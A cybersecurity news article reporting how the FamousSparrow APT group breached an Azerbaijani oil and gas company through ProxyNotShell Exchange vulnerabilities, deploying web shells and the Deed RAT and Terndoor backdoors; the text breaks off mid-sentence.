Chinese APT Exploits Critical Microsoft Exchange Vulnerability to Breach Energy Sector
Key Takeaways Chinese state-sponsored APT group FamousSparrow breached an Azerbaijani oil and gas company. The attackers exploited unpatched Microsoft Exchange vulnerabilities (ProxyNotShell:...
Key Takeaways
- Chinese state-sponsored APT group FamousSparrow breached an Azerbaijani oil and gas company.
- The attackers exploited unpatched Microsoft Exchange vulnerabilities (ProxyNotShell: CVE-2022-41040 and CVE-2022-41082) for initial access.
- The campaign involved multiple waves of attacks, deploying Deed RAT and Terndoor backdoors with advanced evasion techniques.
- The intrusion highlights ongoing, persistent threats to critical energy infrastructure.
A sophisticated Chinese state-linked advanced persistent threat (APT) group, identified as FamousSparrow, successfully infiltrated an oil and gas company in Azerbaijan. The attackers leveraged critical, unpatched vulnerabilities within the target’s Microsoft Exchange server to establish a deep and persistent presence, deploying multiple backdoor families. This incident, detailed in a recent security report, underscores the continuous and evolving threat to global critical energy infrastructure.
Table Of Content
The extensive intrusion unfolded over several months, from late December 2025 to late February 2026, and is considered one of the most thoroughly documented Chinese APT campaigns targeting energy assets in the South Caucasus region. For a comprehensive analysis, refer to the full report.
The attackers demonstrated remarkable persistence, returning to the compromised Exchange server three separate times. Each subsequent visit involved new malware families and adjusted tactics, indicating a deliberate and sustained espionage objective rather than a simple opportunistic exploit. This multi-wave approach suggests a high level of dedication to maintaining access despite detection and attempted remediation by defenders.
Researchers at Bitdefender, who meticulously tracked the entire operation, attributed the intrusion to FamousSparrow with moderate-to-high confidence. Their analysis noted significant tactical and technical overlaps with the Earth Estries threat cluster, further solidifying the attribution.
The timing of this attack is particularly noteworthy. Azerbaijan has become an increasingly vital gas supplier for Europe, especially following the expiration of Russia’s Ukraine transit deal in 2024 and recent disruptions in the Strait of Hormuz in early 2026, which have reduced alternative energy sources. This geopolitical context likely heightened the strategic value of the target for state-sponsored espionage.
Chinese APT Hackers Exploit Microsoft Exchange
The initial phase of the operation saw the deployment of two distinct backdoor families: Deed RAT and Terndoor. Attackers also incorporated an advanced DLL sideloading technique designed to bypass automated security analysis, a level of sophistication rarely observed in previous campaigns linked to these malware families.
This layered operation significantly expanded analysts’ understanding of FamousSparrow’s capabilities and its focus on energy sector targets.
Initial Compromise and Foothold
The intrusion began on December 25, 2025, when the Microsoft Exchange Internet Information Services (IIS) worker process attempted to write a web shell to a publicly accessible directory on the server. This action exploited the ProxyNotShell exploit chain, which consists of two critical vulnerabilities: CVE-2022-41040 and CVE-2022-41082. These vulnerabilities permit unauthenticated remote code execution on unpatched Exchange servers.
In the subsequent days, the attackers deployed additional web shells, using filenames such as key.aspx, log.aspx, errorFE_.aspx, and signout_.aspx. These web shells provided a persistent and reliable command-and-control channel for issuing commands and staging further malicious payloads.
A sophisticated three-component malware chain was then introduced, cleverly disguised as the legitimate LogMeIn Hamachi VPN application to evade detection. The loader file,
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.